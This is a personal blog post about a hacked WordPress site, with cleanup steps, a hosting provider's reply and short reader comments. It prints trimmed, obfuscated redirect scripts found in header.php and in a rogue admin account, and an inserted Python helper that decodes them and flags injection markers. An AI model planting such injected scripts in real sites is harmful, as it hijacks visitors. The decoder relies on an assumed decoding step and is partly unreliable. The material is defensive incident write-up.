I just wanted to warn you: there seem to be a lot of wordpress blogs being hacked right now, and it seems to be the same MO.

Last night I was making a post to my blog.  Once I got done, I went to view the post and make sure there were no errors and everything looked cool.

To my surprise…all was not cool!

My page got redirected to another site!!!

I started jumping around to other pages and the same thing was happening.  Each page was getting redirected, which means each of my blog visitors was going elsewhere and probably thinking I was causing it.  That was not the case.  Now I’m getting pissed.

I knew for this to be happening there had to be some kind of redirect script in one of the more common *.php files.  If you go to the appearance area there is a link to edit your site files.  The more common ones are listed on the right.  I checked the index.php and the footer.php files but did not see anything out of the ordinary.  I then looked at my header.php and found this…

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3Dpx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

To get more information on what this script does, you can always visit this post I found:

Wordpress injection attack and "affiliate ping-pong"

Removing this code is just the start…as you will soon see.

So I removed the redirection script and notified my hosting provider of what was going on.  Here is the response early this morning…

Hello,

It appears that at some point before your wordpress blog was upgraded, it had been exploited and a PHP shell script had been uploaded to the account. This PHP shell was then used to modify your site. I have now removed this. Please ensure that all account passwords have been changed (including this wordpress administrator password) and that any and all plugins have been updated to their most recent versions. Please let us know if you have any further questions.

----

[root@gator550 /home/blyssy/public_html/brianlyssy.com/blog/wp-content/uploads]# find -iname "*.php"
./2009/09/28788.php

It appears the hacker was able to upload this 28788.php file to my wordpress directory.  This was the file that generated the code in the header.php file but it also did one other thing…

It created an administrator account on my wordpress blog!

If this has happened to you, you need to log into your cpanel and check out your wordpress databases.  If you don’t know how to, then I suggest you get a professional.

For those that want to go it alone…once you’re in your cpanel, you want to go to the databases section and select phpMyAdmin.

This will bring up a new window where you will see your databases listed on the left hand side.  If you don’t remember the name associated with the database, then don’t fret; you can figure it out pretty quickly.

Just pick one.  You will see a list of tables for that database.

You want to look for wp_users and select it.  If the current database you’re looking at does not have a wp_users table, then use the drop down box at the top of the listing to select another database.

You want to look for a user row that should not be there (an administrator you did not create) and delete it.

What led me to look there was in the wp-admin "users" area I had seen two admin entries.  One was me and the other was someone I did not know.

One of the fields had more code in it like this…

<script LANGUAGE="JavaScript">function Decode(){var temp="",i,c=0,out="";var str="46!46!46!32!60!98!32!105!100!61!34!117!115!101!114!95!115!117!112!101!114!11714!105!112!116!34!62!l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} </script><script LANGUAGE="JavaScript"> Decode(); </script>

This is not the full code.  It has been trimmed down so you get the idea.
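As an added example (not code from the post, from WordPress or from the hosting provider), here is a Python helper that reverses the two encodings shown above so a site owner can read what injected code actually does, and that flags the markers a theme file like header.php should never contain. The percent-encoded prefix, the tail fragment and the '!'-separated string are copied from the post; the body of dF() is cut off on the page, so the shift-by-trailing-digit step is an assumption based on the common dF obfuscator, and the constructed SAMPLE_HEADER stands in for an infected header.php.

```python
import re
from urllib.parse import unquote

# Layer 1, copied from the post's header.php line: the %XX text fed to unescape(),
# cut off by the post's author after "for(i=".
HEADER_PAYLOAD = (
    "%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74"
    "%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73"
    "%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29"
    "%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D"
)
# Tail of the same line: the argument that dF() later turns back into JavaScript.
DF_TAIL = "px/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1"
# Layer 2, copied from the rogue wp_users row: char codes separated by '!'.
USER_PAYLOAD = "46!46!46!32!60!98!32!105!100!61!34!117!115!101!114!95!115!117!112!101!114!"
# Constructed stand-in for an infected header.php, built from the pieces above.
SAMPLE_HEADER = ("<script language=javascript>document.write(unescape('"
                 + HEADER_PAYLOAD + DF_TAIL + "'))</script>")


def percent_decode(s):
    """Layer 1: what JavaScript's unescape() does to %XX sequences."""
    return unquote(s)


def df_decode(s):
    """Layer 2 for header.php. Assumption: the common dF() obfuscator, whose body the
    post cuts off. The last character is the shift, the rest is unescaped, each char
    code is reduced by the shift, and the result is unescaped once more."""
    shift = int(s[-1])
    shifted = unquote(s[:-1])
    return unquote("".join(chr(ord(ch) - shift) for ch in shifted))


def bang_decode(s):
    """Decode() from the wp_users row: split on '!' and map each char code to text."""
    return "".join(chr(int(tok)) for tok in s.split("!") if tok)


# Markers that a theme file such as header.php has no business containing.
SUSPICIOUS = {
    "document.write(unescape(": r"document\.write\(unescape\(",
    "String.fromCharCode": r"String\.fromCharCode",
    "eval(": r"\beval\(",
    "long %XX run": r"(?:%[0-9A-Fa-f]{2}){20,}",
}


def find_injection_markers(text):
    """Return the names of markers found in a file's text; an empty list is clean."""
    return [name for name, pat in SUSPICIOUS.items() if re.search(pat, text)]
```

Running df_decode(percent_decode(DF_TAIL)) resolves the post's tail fragment to the end of a window.location assignment followed by a closing script tag, which is the redirect the post describes.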

Anyway…I could not delete this account through the wp-admin area!

That is why I had to resort to going to the database.

I hope this helps others.  I would suggest everyone needs to check their blogs, update their blogs, and change their passwords.

I would so love to punch this asshole!  A couple of times!




4 Responses to “Wordpress Hacked Mal/ObfJS-H”

  1. MixtLupus says:

    Your story is exactly the same as mine. Wordpress needs to get their act together and fix these flaws :(

  2. Gopsnini says:

    Here is what I will say: thank you.. а82ч

  3. After reading your site, your site is very useful for me. I bookmarked your site!

  4. Brian Lyssy says:

    Then you know how pissed I was when it happened. I would love to meet the guy who did this face to face.